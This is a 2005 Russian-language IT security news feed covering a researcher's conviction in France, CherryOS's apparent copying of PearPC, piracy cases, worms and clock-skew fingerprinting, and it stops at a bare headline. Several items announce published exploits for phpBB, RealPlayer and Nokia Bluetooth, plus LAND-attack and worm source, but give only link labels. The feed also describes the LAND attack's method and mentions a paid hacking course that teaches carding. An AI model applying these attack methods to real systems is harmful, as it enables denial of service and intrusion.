Теперь исследователи, которые применяют реинжиниринг для поиска ошибок в ПО, больше не смогут публиковать свои находки: во вторник парижский суд оштрафовал за это специалиста по безопасности. В 2001 году французский секьюрити-эксперт Гийом Тена обнаружил ряд уязвимостей в антивирусном ПО Viguard компании Tegam International. В марте 2002 года Тена, который в то время был известен под псевдонимом Guillermito, опубликовал свои находки в онлайне. Однако Tegam отнеслась к действиям Тена без понимания и подала на исследователя в суд. Дело рассматривалось в Париже. Обвинители утверждали, что Тена нарушил статью 335.2 закона об интеллектуальной собственности, и требовали четырехмесячного тюремного заключения и штрафа в 6000 евро. Во вторник суд постановил, что эксперт не должен сидеть в тюрьме, но назначил условный штраф в 5000 евро. Это означает, что штраф придется заплатить лишь в том случае, если Тена вновь опубликует информацию об уязвимостях в программном обеспечении. Ш. Бекрар, секьюрити-консультант и соучредитель французского веб-сайта K-Otik Security, который регулярно публикует коды эксплойтов, назвал постановление суда очень плохой новостью для индустрии секьюрити-исследований Франции, хотя, конечно, хорошо, что Тена избежал тюрьмы. «Публикация информации об уязвимостях или доказательств концепции с использованием реинжиниринга или дизассемблирования во Франции стала нелегальной. А как исследователь может получать такую информацию, если у него нет возможности изучать структуру ПО?» На своем веб-сайте Тена утверждает, что если независимые исследователи не смогут свободно публиковать свои находки в сфере безопасности ПО, то пользователям придется оценивать качество программ лишь по «маркетинговым пресс-релизам». «К сожалению, похоже, что Франция, а может быть и Европа, движется именно в этом направлении», — говорит Тена. Tegam возбудила также против Тена гражданский иск, в котором требует компенсации ущерба в размере 900 тыс. евро.
Подробнее

10/03/2005 11:27 Увидела свет первая версия эмулятора CherryOS
CherryOS, эмулятор MacOS, ставший предметом крупного скандала сразу после анонса, наконец, увидел свет. CherryOS, как утверждают его создатели из гавайской компании Maui-X-Stream, занимающейся в основном потоковыми медиатехнологиями, эмулирует на PC работу процессора Mac G4 и обеспечивает работоспособность MacOS и программ под ней. Скандал же был связан с практически единогласными утверждениями о том, что CherryOS (а точнее, тогдашний, совсем сырой ее вариант) - это, на самом деле, эмулятор PearPC, не отличающийся быстродействием программный пакет с открытым исходным кодом, позволяющий запускать Mac OS на других, нежели Mac, машинах. То же самое говорят и теперь: по утверждению BetaNews, CherryOS загружается решительно так же, как и PearPC, сообщения об ошибках практически идентичны. Кроме того, эмулятор CherryOS включает MacOnLinuxVideo, а это тот же самый видеодрайвер, что используется в PearPC. Наконец, конфигурационный файл тоже "слишком уж напоминает" такой же в PearPC. При этом создатель CherryOS утверждал ещё прошлой осенью, что код PearPC "случайно попал" в его разработку, но непременно будет убран. Судя по всему, этого не произошло, и речь идёт о фактическом воровстве: PearPC распространяется под GPL, а CherryOS - закрытый пакет, за который, к тому же, просят 50 долларов.
Подробнее

10/03/2005 10:44 Очередной пират из "Эльдорадо" получил срок
В Москве вынесен очередной обвинительный приговор в отношении бывшего сотрудника торговой сети «Эльдорадо». За распространение нелицензионного программного обеспечения он был приговорен к двум годам лишения свободы условно. Нагатинский районный суд Москвы вынес обвинительный приговор в отношении бывшего продавца-консультанта магазина торговой сети «Эльдорадо», специализирующейся на продаже бытовой электроники. Андрей Куцько был признан виновным по части 2 статьи 146 УК РФ, предусматривающей уголовную ответственность за незаконное использование объектов авторского права, и приговорен к двум годам лишения свободы условно с испытательным сроком на один год. Уголовное дело было возбуждено прокуратурой по результатам проверочной закупки компьютерной техники, проведенной сотрудниками милиции в магазине торговой сети «Эльдорадо», принадлежащем компании «Легион» и расположенном в Москве на Каширском шоссе. В ходе проверки было приобретено несколько системных блоков, на которые Андрей Куцько установил нелицензионные копии программ для ЭВМ, авторские права на которые принадлежат корпорации Microsoft. Данные обстоятельства были подтверждены в ходе последующей судебно-технической экспертизы. По мнению представителей Microsoft, постановление суда в отношении Куцько является справедливым. Это уже не первый приговор в отношении сотрудников торговой сети «Эльдорадо». В сентябре 2004 года Нагатинским районным судом Москвы был вынесен обвинительный приговор трем бывшим сотрудникам торговой сети «Эльдорадо» за незаконное использование объектов авторского права, совершенное в крупном размере группой лиц по предварительному сговору. Тогда нарушители были приговорены к двум годам лишения свободы условно с испытательным сроком на два года. В ноябре 2004 года сотрудники милиции провели проверку одного из магазинов «Эльдорадо», находящегося в г. Раменское Московской области, по результатам которой прокуратурой было возбуждено уголовное дело против продавца, установившего в ходе проверочной закупки нелицензионное программное обеспечение на реализуемые персональные компьютеры.
CNews

10/03/2005 10:13 По уровню технологического развития Россия занимает 62 место в мире
Всемирный экономический форум (ВЭФ) провел очередное ежегодное исследование 104 стран мира на предмет активности использования в них передовых информационных и коммуникационных технологий. Результатом исследования стал список государств - от возглавивших его наиболее "высокотехнологичных" до технически отсталых, завершающих перечень. Первое место в списке неожиданно занял Сингапур, сместивший долго лидировавшие по этому показателю США. В минувшем году США оказались даже не на втором месте, а на пятом. Между ними разместились европейские страны, интенсивно развивающие у себя новые технологии. Второе место заняла Исландия, третье - Финляндия, четвертое - Дания. Россия в списке ВЭФ заняла 62 место - между Коста-Рикой и Пакистаном.
Полный список

9/03/2005 17:41 Автор Linux Линус Торвальдс перешел на Apple Mac
Линус Торвальдс (Linus Torvalds) с недавнего времени в качестве основного компьютера использует Apple Macintosh. Автор ядра открытой операционной системы Linux в рассылке Linux Kernel Mailing List сообщил, что более не использует процессор Intel x86 в качестве основы своего настольного ПК. Во время обсуждения снижения объема Linux-ядра он заметил, что предлагаемый им для рассмотрения патч для платформы x86 совсем не был протестирован. Журналисты из ZDNet Australia заинтересовались этим сообщением и решили узнать у Торвальдса, как обстоит ситуация на самом деле. «Моей главной машиной в эти дни является G5 (aka PowerPC 970) с двумя процессорами по 2 ГГц — физически это обычный Apple Mac, однако, очевидно, на нем запущена ОС Linux, так что не думаю, что вы и впредь будете называть это Маком ;)», — отозвался Линус.
Nixp.Ru

9/03/2005 16:14 Автоматические методы детектирования спама
На сайте spamtest.ru опубликована статья, в которой рассмотрены автоматические механизмы фильтрации спама, работающие опираясь на массовую статистику большого почтового потока, на крупных почтовых серверах, сообщает opennet.ru. Рассказывается про сигнатуры, устойчивые к небольшим изменениям письма. К сожалению, против новой техники генерации спам писем, в которой для каждого слова случайно подбирается синоним из списка, подобный метод бесполезен.
Статья

9/03/2005 15:59 Угроза пользователям IM стремительно растет
Количество спама и вирусов, рассылаемых при помощи интернет-пейджеров, неуклонно растет. Согласно отчету IMlogic Threat Center, недавно появились целых три новых червя, распространяющихся через MSN Instant Messenger. Как передает InformationWeek, IMlogic Threat Center объеденила данные нескольких антивирусных компаний. Получилось, что с каждым месяцем объем вирусов и спама в ИМ вырастает на 50%, и эта тенденция сохранится на протяжении всего 2005 года. 7 из 10 вирусных атак приходятся на пользователей MSN Messenger. На долю пользователей интернет-пейджеров от Yahoo и AOL — 18 и 12 процентов соответственно.
"Вебпланета"

9/03/2005 13:53 Linux Server Break-in Challenge
Начинается соревнование по администрированию реального компьютера в Интернете под управлением ОС Linux, сообщает linux.org.ru. Данный сервер имеет настройки по умолчанию и вам даётся 96 часов на его управление. Если в течение 48 часов сервер не взломают, то вы выиграли приз! Все подробности по ссылке
Подробнее о соревновании

9/03/2005 13:19 Банкоматы Wells Fargo переведены на Windows
Банковская сеть Wells Fargo завершила пятилетний проект по оснащению Web-технологиями 6200 ее банкоматов. Как сообщают в компании, новая инфраструктура на основе Windows призвана обеспечить возможность удаленного обновления ПО и добавления сервисов сразу на всех банкоматах сети. По словам представителя Wells Fargo, наиболее сложная часть модернизации состояла в переносе серверного ПО с OS/2 на Windows, а также в интеграции с системами подразделения по Internet-банкингу и других. Кроме того, пришлось заменить сами банкоматы, поскольку процессорной мощи старых для нового ПО не хватало. Аналитики Gartner высказывают предположение о возможности роста мошенничеств в связи с повсеместным переводом банкоматов на Web-технологии. Как сообщил представитель Wells Fargo, в компании "озабочены проблемой безопасности Windows-систем, но не более, чем защищенностью OS/2-банкоматов". Необходимость смены платформы в Wells Fargo объясняют также тем, что банкоматы на базе OS/2 уже не выпускаются. Согласно прогнозу TowerGroups, к 2006 году около 30% банкоматов во всем мире будут работать под управлением Windows. Учитывая крайние новости о повторении старых уязвимостей в новых версиях ОС Windows, это, пожалуй, скорее должно настораживать, чем радовать. Та же "полуось" известна своей очень устройчивой работой и высоким уровнем безопасности.
"Открытые системы"

9/03/2005 13:14 "Лаборатория Касперского": вирусописатели сотрудничают друг с другом
Аналитики «Лаборатории Касперского», российского разработчика систем защиты от вирусов, хакерских атак и спама, пришли к выводу о существовании тесного взаимодействия между авторами червей Bagle, Zafi и Netsky. Вредоносная программа SpamTool.Win32.Small.b, обнаруженная экспертами компании 15 февраля и выполнявшая скрытый сбор адресов электронной почты на персональных компьютерах, попутно исключая из найденных адреса антивирусных компаний, оказалась частью организованной 1 марта атаки червя Bagle. Это позволяет сделать вывод о том, что авторы червей Bagle, Zafi, Netsky и ряда других осуществляют тесное взаимодействие между собой. Возможно, они не знакомы между собой лично, но то, что они используют для рассылок червей информацию, полученную автором Bagle, не вызывает сомнений. В течение только двух дней было разослано порядка 50 различных модификаций вредоносных программ. Все рассылки производились распределенными по времени, что говорит о том, что они происходят в автоматическом или полуавтоматическом режиме. Эти данные свидетельствуют о резком витке криминализации интернета и дальнейшем развитии преступных технологий: сетевые атаки начали осуществляться в автоматическом режиме, планироваться в несколько этапов и разноситься по времени; в целях увеличения эффективности своих атак авторы разных червей объединяют свои усилия, создавая группы, обмениваясь информацией и перенимая друг у друга схемы и техники работы.
CNews

9/03/2005 12:12 10 марта стартует компьютерная выставка CeBIT
10 марта в Ганновере (Германия) стартует ежегодная компьютерная выставка CeBIT 2005, сообщает Associated Press. Выставка продлится неделю и закончится 16 марта. Организаторы ожидают, что 27 павильонов CeBIT посетят порядка 510 тыс. человек, что обусловлено растущим спросом и интересом потребителей к быстрыми темпами развивающейся индустрии высоких технологий. Выставка представляет интерес не только для уже известных брендов, но и для молодых компаний, которые только начинают свой путь в компьютерной индустрии. Ожидается, что на CeBIT будут представлены новинки от таких компаний, как Nokia, Alcatel, Asus, Siemens. Кроме того, свои разработки в области мобильных телефонов представит компания Gigabyte.
Подробности

9/03/2005 11:59 Microsoft подготовила инструменты разработки для Xbox-2
В понедельник Microsoft выпустила новый набор инструментов разработки, призванный облегчить создание игр для следующей версии видеоигровой консоли Xbox. XNA Studio — один из первых крупных продуктов инициативы XNA, которую Microsoft объявила год назад с целью стандартизации разработки игр для разных систем. Разработчики могут применять одни и те же инструменты XNA при создании игр для Windows-ПК, существующей версии Xbox и будущих версий игровой консоли Microsoft. Система XNA Studio основана на Visual Studio 2005 Team System, наборе инструментов программирования Microsoft для крупных команд разработчиков под Windows. В XNA Studio также войдут средства коллективной работы, обеспечивающие возможность обмена кодом между программистами, дизайнерами, тестерами и другими членами проекта, говорится в заявлении Microsoft. Кроме того, ПО вводит новый унифицированный формат файлов, облегчающий обмен игровыми ресурсами. Представители Microsoft говорят, что XNA исключит из процесса разработки проработку деталей, так что студии смогут сохранить бюджеты игр для Xbox 2 примерно на том же уровне, что и для Xbox.
Подробности

9/03/2005 10:55 Найден новый мобильный MMS-вирус, ведущий борьбу с отморозками
Исследователи из финской интернет-компании F-Secure обнаружили новый вид вируса для мобильных телефонов, распространяющегося с помощью механизма передачи мультимедийных сообщений MMS. Вредоносная программа получила название "CommWarrior" и поражает телефоны Nokia серии 60 на базе операционной системы Symbian. Отмечается, что вирус отличен по схеме распространение от уже известного мобильного вируса Cabir, который пытается проникнуть в ОС по внешнему интерфейсу под видом устанавливаемой программы. CommWarrior, подобно почтовому "червю", приходит в виде входящего MMS-сообщения с вложенным медиафайлом - картинкой, аудио- или видеозаписью. С помощью 20 разных вариантов текста письма он пытается вынудить пользователя открыть вложение, которое содержит исполняемый код, эксплуатирующий уязвимость в данной модели операционной системы. Это первый вирус подобного рода, и его появление, по мнению специалистов, свидетельствует о нарастающей угрозе безопасности портативных компьютерных устройств, которые ранее считались свободными от подобных угроз. Финские специалисты отмечают, что вирус CommWarrior, вероятно, имеет российское происхождение, так как в теле его обнаружена строка "OTMOP03KAM HET!".
Подробности

9/03/2005 10:47 ФБР провело "крупнейшее в истории расследование дела о контрафактном ПО"
Власти США начали судебный процесс над тремя своими гражданами, которые, как утверждает американский Минюст, были арестованы в результате "крупнейшего в истории расследования дела о контрафактном ПО", сообщает Associated Press. Агенты ФБР более года выслеживали организаторов международной сети, распространявшей нелегальные копии компьютерных программ, в том числе через Интернет "в закодированном виде". Три человека, которые, как предполагается, возглавляли сеть, заработали на этом "миллионы долларов". Установлено, что возглавлял сеть, подробности о которой не разглашаются, некто Сет Клейнберг (Seth Kleinberg) - 26-летний выпускник средней школы, нигде не работающий и живущий со своим отцом. Ему грозит от 5 до 6 лет тюрьмы. Ему помогали 20-летний студент Мэрилендского университета Джефри Лерман (Jeffrey Lerman) и 32-летний Альберт Брындза (Albert Bryndza) из Нью-Йорка. Отмечается, что операция по раскрытию сети называлась "Операция "Высшее образование"" (Operation Higher Education) и проводилась, помимо США, более, чем в 10 других странах. Руководило мероприятию недавно созданное подразделение отдела ФБР по борьбе с киберпреступностью в Нью-Хейвене, штат Коннектикут.
Lenta.Ru

8/03/2005 18:21 Эксплоит уязвимости phpBB-2
Продолжая тему эксплоитов уязвимостей в phpBB. Опубликована очередная версия эксплоита до версии 2.0.12, но уже на Перле.
Эксплоит

8/03/2005 10:51 Эксплоит уязвимости RealPlayer
Опубликован эксплоит уязвимости, обнаруженной в RealPlayer версии 10 при обработке .smil-файлов.
Подробности

8/03/2005 10:39 Новый вариант червя perl.Santy
Как сообщил Bugtraq некий The Prohacker, обнаружен новый вариант червя perl.Santy, который используется для взлома vBulletin (ПО организации форума на PHP) до версии 3.0.6. Администраторам серверов, на которых используется это ПО рекомендуется обновиться до версии 3.0.7, выпущенной на прошлой неделе Jelsoft. Также опубликован исходный код нового червя
Исходный код червя

8/03/2005 10:14 Эксплоит для реализации LAND-атаки
Ребята из российской команды RusH Security Team опубликовали исходный код, позволяющий произвести LAND-атаку, которая, как мы писали ранее в новостях, способна вывести из строя сервера под управлением ОС WinXP/2003. Необходимо отметить, что исходный код программы под названием LAND был опубликован ещё в 97 году.
Исходный код
Изначальный текст land
Описание Land-атаки на русском языке

8/03/2005 09:57 Вышло ядро 2.6.11.1
Началась новая эра в именованиии ядер ветки 2.6.х, сообщает linux.org.ru. Теперь после выпуска ядра 2.6.х Линусом Торвальдсом будут следовать ядра версий 2.6.x.1, 2.6.x.2 и т.д. На данный момент ядро 2.6.11.1 включает исправление следующих проблем: снова работают клавиатуры от DELL, исправлены ошибки компиляции raid6 на ppc Altivec.
ChangeLog

8/03/2005 09:42 В чём смысл атак в Интернет?
Специалисты ФБР США в области расследования киберпреступлений, предоставляют исчерпывающую информацию о возможных путях вторжения в программное обеспечение. Однако зачастую эта информация не отвечает на вопрос: откуда и кем было совершено киберпреступление? «Возможность раскрытия преступления такого рода, маловероятна», - заявил Ken Dunham, эксперт iDefense Inc., фирмы, занимающейся онлайновой защитой. “У нас нет прямых доказательств”. Большинство квалифицированных специалистов полагают, что программирование для Internet-червя, основанного на программном коде, разместил на Website несколько месяцев назад известный британский компьютерный исследователь David Litchfield. Позже код программирования был изменён хакером, известным в китайском хакерском андеграунде под именем «Lion». Вышеупомянутый изменённый код был размещён на онлайновской странице китайских хакеров «Honker», организации, участвующей в стычках между американскими и китайскими хакерами. В 2001 году этот вирус проник в базу данных ВВС США, что вызвало вынужденную посадку американского военного самолёта-невидимки. Как утверждают эксперты, “невозможно сказать наверняка запустили ли этот вирус именно китайские хакеры”. “Существуют несомненные связи”, - говорит Нил Мета (Neel Mehta), который изучал систему программирования для Atlanta-based Internet Security System Inc. “Это более, чем случайное совпадение, тем не менее, я не стану утверждать, что это именно Honker”. В отличие от способов вторжения в программное обеспечение, которые использовались в предыдущих Internet-атаках, последний программный код сокращён по объёму и не содержит информации о прозвище и о местонахождении хакера. Используемый метод передачи вируса позволил хакеру с лёгкостью замести следы. «Это всё пустые слова», - заявляет Марк Майфрет (Marc Maiffret), представитель Eye Digital Security Inc. “Достаточно было простого вторжения, чтобы вирус начал размножаться”. Схема разрушительного вируса “Love Bug“, который был распространён в мае 2000 года филиппинским студентом, в своём программном коде включала информацию о его приятелях по университету, в котором он учился. Эти ошибки позволили спецагентам ФБР выйти на его след в течение суток. Эксперты утверждали, что они не нашли определённых программных технологий, которые использовал автор нового вируса, что позволило бы им установить его личность. Специалисты ФБР сравнивали этот вирус со схемой других разрушительных вирусов. Другие независимые эксперты смотрят на это без особого оптимизма. “По всей вероятности федеральные агенты не могли выследить автора вируса, изучая схемы или исследуя происхождение вторжения”, - заявил Kevin Mandia, специалист Foundstone Inc. “Сделать это будет не легко”. Марк Майфрет соглашается с этим: «Хакеры не оставляя следов», - предполагает он. «Они бросают вызов ФБР». Представитель ФБР, Пауль Брессон (Paul Bresson), признаёт, что хакерские атаки без следов, являются вызовом, который бросают хакеры агентам ФБР по расследованию киберпреступлений. Существует и другая точка зрения, согласно которой ФБР США заранее было известно о том, что распространение вируса началось в Корее и в Японии, как раз перед тем, как ошеломлённые служащие заметили массовое вторжение этого вируса в систему программного обеспечения. Хотя первыми и пострадали корейские и японские компьютеры, однако это совсем не означает, что автор вируса житель этих стран.
Crime-Research

7/03/2005 14:16 Symantec запатентовала одну из своих антивирусных технологий
Патент N 6,851,057 на "обнаружение вирусов, управляемое данными" описывает систему обнаружения вирусов, контролируемую псевдокодом на промежуточном языке в целях выявления вирусов в файлах с множественными точками входа, сообщает bugtraq.ru. Патент может относиться к любой технологии, позволяющей использовать скриптовые языки для динамического определения сканируемой области файла. Данный подход упрощает также обнаружение всевозможного spyware. Представитель компании заявил, что она заинтересована в первую очередь в демонстрации своего превосходства в антивирусной области, и отметил, что Symantec пока не занималась проверкой продуктов конкурентов на предмет использования подобных технологий.
Подробности

7/03/2005 13:41 Отказ в обслуживании в Nokia Symbian
Обнаружена уязвимость в ОС Nokia Symbian 60 (ser.60), в реализации работы с Bluetooth-устройствами. Связана с алгоритмом обработки "ников". Уязвимость может быть эксплуатирована при поиске доступных Bluetooth-устройств. Злоумышленник может специальным образом создать nickname и вызвать перезагрузку устройства. Способов устранения уязвимости не существует в настоящее время. Опубликован исходный текст эксплоита уязвимости на Перл.
Эксплоит

7/03/2005 12:40 Список аббревиатур по информационной безопасности
Любому из специалистов по защите информации приходится регулярно знакомиться с англоязычными документами по информационной безопасности и конечно же в каждом из них втсречаются различные аббревиатуры. Какие-то мы узнаем сразу (например, VPN), какие-то думаем, что узнаем (например, MAC), а какие-то ставят нас в тупик (например, CCMP). К сожалению, если найти расшифровку одного-двух акронимов достаточно легко, то их постоянное использование в документе ставит читателя в сложное положение - он должен регулярно переключаться между Интернет и документом, теряя нить рассуждения и вынуждая себя заново перечитывать текст. Чтобы помочь специалистам в этой ситуации, компания Cisco Systems разработала и предлагает всем желающим документ, содержащий свыше 900 английских аббревиатур, встречающихся в различных документах, презентациях, статьях и т.д.
Список в PDF

7/03/2005 12:13 В Рунете появилась школа хакеров
Лавры небезызвестного шута рунета Арви Дэ Хэккера не дают, по-видимому покоя молодым, пытливым и, главное, желающим заработать мозгам рунета. Online-Школа Хакеров, сообщает Internet.Ru, приглашает пройти курс углубленного обучения по специально разработанной программе. Обучение проводится по интернет-пейджеру ICQ. Пройдя курс обучения, ученик "получит знания в области хакерства и гарантированно сможет": делать дефейс сайтов (подмену главной страницы), получать доступ к чужим почтовым ящикам, получать/изменять информацию, хранящуюся в базах данных, повысить свою безопасность и безопасность своих серверов в Сети, получить навыки кардинга. Полный курс обучения - 500€ (50€ урок), если вы хотите пройти только те уроки, которые выберете сами, цена каждого урока - 100€.
"Школа хакеров"

7/03/2005 11:59 Россиянам разрешат GPS и подробные карты?
Россия близка к отмене архаичных и во многом уже анекдотичных запретов на доступ собственных граждан к картам, космическим и аэроснимкам родных просторов, а также к системе глобального высокоточного позиционирования GPS. Последние инициативы Минэкономразвития РФ и ГИС-ассоциации по выработке концепции инфраструктуры пространственных данных, о которых на днях заявило Минэкономразвития, свидетельствуют о том, что отмен наиболее одиозных ограничений — не только «не за горами», но и является делом ближайшего будущего. Подготовленная с этой целью концепция разработана под патронатом Минэкономразвития в рамках программы «Электронная Россия». Среди ее авторов — ведущие отечественные специалисты в области картографии, геоинформатики и дистанционного зондирования Земли. Тем самым подводится черта под «страусиной» политикой, заключающавшейся в запрете на доступ рядовых пользователей к высокодетальным картографическим данным и материалам дистанционного зондирования, в которых отчаянно нуждается вся страна и которые уже давно доступны на мировом рынке. На вопрос CNews.ru о сути концепции инфраструктуры пространственных данных заместитель директора департамента корпоративного управления и новой экономики Минэкономразвития Церен Церенов сообщил, что, в частности, предполагается создание баз данных, в которых будут собираться картографические материалы и данным дистанционного зондирования Земли — причем независимо от того, кто является их производителем. Это ставит своей целью существенное снижение «информационных издержек» для бизнеса, и позволит повысить общую эффективность народного хозяйства.
CNews

7/03/2005 11:24 Первый "путинский" технопарк построят в Питере
Мининформсвязи согласовало проект создания первого технопарка, входящего в четверку финансируемых из средств федерального бюджета: он будет построен на базе Санкт-Петербургского государственного университета телекоммуникаций имени Бонч-Бруевича. Запустить питерский технопарк планируют уже в этом году. Мининформсвязи начало активные консультации с главами регионов, названных президентом Путиным в качестве приоритетных для развития сети технопарков. Напомним, что среди них Новосибирская область, Нижегородская область, Санкт-Петербург и Москва. Санкт-Петербург стал первым городом в турне по пилотным регионам, запланированном министром информационных технологий и связи РФ Леонидом Рейманом, который будет курировать создание ИТ–парков во всех пилотных регионах. Следующую поездку он совершит в Московскую область, где проведет консультации с губернатором области по вопросам развития технопарков. Выступая 4 марта на совещании с администрацией Санкт-Петербурга, Леонид Рейман подчеркнул, что министерство не ограничивает создание ИТ-парков только на четырех площадках. "В России может быть несколько десятков технопарков, мы предложили только первые варианты", - заявил он. На совещании было утверждено соглашение между Мининформсвязи и правительством Санкт-Петербурга по вопросу развития технопарка на базе Санкт-Петербургского государственного университета телекоммуникаций им проф. М.А. Бонч-Бруевича. Кроме того, принято решение о создании совместной рабочей группы министерства и городской администрации по разработке основных направлений развития будущего технопарка. По мнению разработчиков проекта, поддержка со стороны Мининформсвязи и администрации города позволит запустить его уже в этом году.
Подробности

7/03/2005 10:33 Microsoft не придется платить истцам полмиллиарда долларов
Федеральный апелляционный суд США отменил вердикт присяжных по патентному иску чикагской компании Eolas Technologies и Калифорнийского университета против корпорации Microsoft, сообщает News Factor. В августе 2003 года, согласно решению присяжных, Microsoft обязалась к выплате 521 млн. долларов США в качестве возмещения ущерба за нелегальное использование запатентованных истцами технологий в браузере Internet Exlorer. Теперь дело будет направлено на повторное рассмотрение. Апелляционный суд признал, что привынесении приговора судом низшей инстанции не были учтены два аргумента, которые приводила Microsoft. Иск Eolas Technologies, компании, основанной и возглавляемой бывшим профессором Калифорнийского университета Майклом Дойлом, против Microsoft был подан еще в 1999 году. Он касается патента США номер 5,838,906, полученного университетом в ноябре 1998 года и описывающего, в частности, "систему, позволяющую получать доступ к встроенным в веб-страницы программным объектам и исполнять их". В компании Eolas, который били переданы права на использование патента, считают, что технологии, нарушающие этот патент, использовались в браузере Internet Explorer и ОС семейства Windows, начиная с Windows 95. В иске Eolas требует запретить Microsoft выпускать, использовать и продавать любые продукты, нарушающие патент.
Более подробно

6/03/2005 12:37 Эксплоит уязвимости в phpBB
federico gonzales опубликовал эксплоит для популярного ПО построения форумов phpBB <= 2.0.12. Использование эксплоита предельно просто, однако (как пишет автор) требует наличия Moziila или Firefox. Необходимо посетить форум, который требуется "проверить на безопасность" (с отключённой функцией autologin), закрыть браузер и выполнить эксплоит. Сам эксплоит, собственно, просто модифицирует локальный файл cookies.txt, изменяя user_id. Необходимо отметить, что другой автор предложил браузеронезависимый код эксплоита
Эксплоит
Второй вариант эксплоита

6/03/2005 11:29 Intel возлагает большие надежды на mesh-сети 802.11s
Новый стандарт обещает простоту конфигурирования, высокую пропускную способность и повышенную гибкость беспроводных сетей для дома и офиса. В среду Intel представила свой первый проект нового стандарта беспроводной mesh-сети 802.11s. Mesh-сети — это самоконфигурируемые системы, в которых каждый узел может передавать сообщения по поручению других, что увеличивает дальность связи и доступную полосу пропускания. По словам В. Стивена Коннера, архитектора беспроводных сетей Intel и технического редактора рабочей группы IEEE 802.11s, выступившего перед разработчиками на конференции Intel Developer Forum в Сан-Франциско, стандарта таких сетей пока не существует. Ячеистые сети уже применяются в очень крупных системах в таких городах, как Тайбей, а также в некоторых отраслях промышленности, однако ни одна из этих систем не взаимодействует с другими и не годится для использования в домах или офисах. Недавно группа 802.11s, которая впервые собралась в июле 2004 года, обратилась с первым предложением о подаче проектов, и Intel подготовила стандарт сети для использования в офисах и жилых помещениях. Проект Intel опирается на существующие стандарты, такие как протоколы беспроводной связи 802.11a/b/g и безопасности 802.11i, и совместим с ними. Он добавляет дополнительные функции, которые позволят беспроводным узлам обнаруживать друг друга, аутентифицировать и устанавливать связи между собой, вырабатывая наиболее эффективный маршрут для решения конкретной задачи. Технология предполагает использование концепции гарантированного качества обслуживания, так что широкополосный видеопоток в системе домашних развлечений может передаваться по одному маршруту, а данные из Web — по другому. Такой уровень самоконфигурирования и знания среды позволяет не только создавать эффективные беспроводные сети, но и автоматизировать весь процесс установки и реконфигурации этих сетей.
Более подробно

6/03/2005 11:17 Возможность проведения LAND-атаки против ОС семейства Windows
Системный инженер Dejan Levaja из Белграда сообщает, что им обнаружена возможность проведения DoS-атаки, названной (если не ошибаюсь, ещё в 97 или 98 г.) LAND против современных версий ОС Windows. Суть LAND-атаки заключается в посылке spoof-пакетов с установленным флагом SYN в адрес жертвы, при этом в качестве IP-адреса источника и получателя и порта источника и получателя значится сетевой адрес жертвы. В результате при посылке определённого количества подобных пакетов CPU загружается на 100% и сервер жертвы зависает намертво. Атака проверялась на серверах под управлением ОС Windows Server 2003 и XP SP2 (с выключенным встроенным файрволлом ICF). Как пишет автор, включение встроенного (либо стороннего) файрволла позволяет предотвратить атаку. M$ была уведомлена об уязвимости 7 дней назад, однако ответа не последовало. В качестве инструмента для атаки использовались IP Sorcery и tcpreplay. Самое интересное в этой ситуации, что патч против атаки типа LAND существовал ещё для ОС Win98SE, но, как показывает история, у Microsoft удивительная способность наступать на одни и те же грабли.
Подробности

6/03/2005 10:09 В США рассмотрено первое уголовное дело о спаме
В США завершилось рассмотрение первого уголовного дела против спамеров. Перед судом предстали 28-летняя Джессика Дегрут (Jessica DeGroot) и ее 30-летний брат Джереми Джейнс, сообщает сайт Security Pipeline. Решением судьи Томаса Хорна (Thomas D. Horne) Джессика Дегрут признана невиновной. По словам Хорна, он не нашел в деле «рационального основания» для вынесения вердикта и высказал предположение о том, что членов жюри смутили технические детали обвинения. Хорн посчитал, что члены жюри, изучая антиспамерский закон штата Вирджиния, вероятно, что-то упустили. Вместе с тем, Хорн поддержал обвинение против Джереми Джейнса, который рассылал спам, используя фальшивые адреса из штата Северная Каролина. Обвинения Дегрут и Джейнсу были предъявлены в ноябре прошлого года. Спамерам инкриминировали рассылку более 10 тысяч электронных писем с фальшивых электронных адресов через сервер провайдера AOL. В качестве наказания для Джейнса жюри предложило 9 лет лишения свободы, для Дегрут — штраф в размере 7,5 тысяч долларов. Антиспамерское законодательство штата Вирджиния — самое суровое из всех штатов США. Судьи привлекают к ответственности жителя Северной Каролины, используя законы Вирджинии по следующей причине: в этом штате расположены серверы AOL, через которые спамер рассылал свои письма. Адвокат Джереми Джейнса утверждает, что его клиент рассылал спам не из Вирджинии и намеревается подавать апелляцию.
Viruslist

5/03/2005 14:11 Системные часы — как отпечаток пальца для ПК
Ни использование прокси-серверов, ни блокировка cookies не помогут сделать серфинг анонимным, если ваш компьютер можно вычислить по его «отпечаткам пальцев» — отклонению системных часов. Исследователи из университета Калифорнии опубликовали чрезвычайно интересную научную работу с описанием эффективной техники опознания компьютера через интернет. С ее помощью можно безошибочно распознать определенное устройство, под каким бы IP-адресом и в какое бы время оно не выходило на связь. Как известно, уже давно разработаны эффективные способы для удаленного опознания (fingerprinting) операционной системы. Американские исследователи развили эту идею и представили техники для удаленного опознания физических устройств, что можно осуществлять даже «при отсутствии сотрудничества» со стороны этих устройств, то есть незаметно. Научную работу с описанием техник идентификации подготовил Тадаеши Коно (Tadayoshi Kohno), аспирант университета Калифорнии. Технология работает с помощью выявления микроскопических отклонений в показаниях системных часов. Например, такие отклонения можно вычислять с помощью информации, содержащейся в заголовках пакетов TCP и ICMP. Что характерно, отклонения в показаниях системных часов остаются практически неизменными на протяжении длительного времени, поэтому они могут служить своеобразным идентификатором конкретного устройства. Во время экспериментов исследователи могли уверенно распознавать каждый из 69-ти компьютеров, которые участвовали в тестировании. На протяжении 38-ми дней, во время которых продолжался эксперимент, «отпечаток системных часов» для каждой машины оставался практически неизменным.
Более подробно

5/03/2005 12:57 В Великобритании введут налог на компьютеры
"Телевизионный" налог, взимаемый с каждого телевизора на содержание общественной телерадиокомпании BBC, может быть отменен в пользу нового "компьютерного" налога. Толчком к обсуждению возможности введения такого сбора стала обеспокоенность британских властей темпами развития сетей высокоскоростного доступа. Точнее говоря, сами темпы власть предержащих только радуют, но вот их применение конечными пользователями им совсем не нравится. Дело в том, что в последнее время все большее число жителей Альбиона предпочитает вообще не покупать телевизоры, а смотреть те же передачи BBC в онлайн-трансляции прямо с экрана монитора. Понятно, что BBC, финансирующаяся исключительно с "телевизионного" налога, от этого страдает. Журнал The Register пишет, британское Министерство культуры, информации и спорта предложило изменить действие "телевизионного" налога и взимать его либо с каждого домохозяйства, не взирая на наличие или отсутствие телевизора, либо с каждого компьютера, установленного в доме. По всей видимости, изменение принципов взимания "телевизионного" налога произойдет только в 2017 году. Но все равно как-то неприятно.
Internet.Ru

5/03/2005 11:55 Хакер помог будущим слушателям Гарвардской бизнес-школы
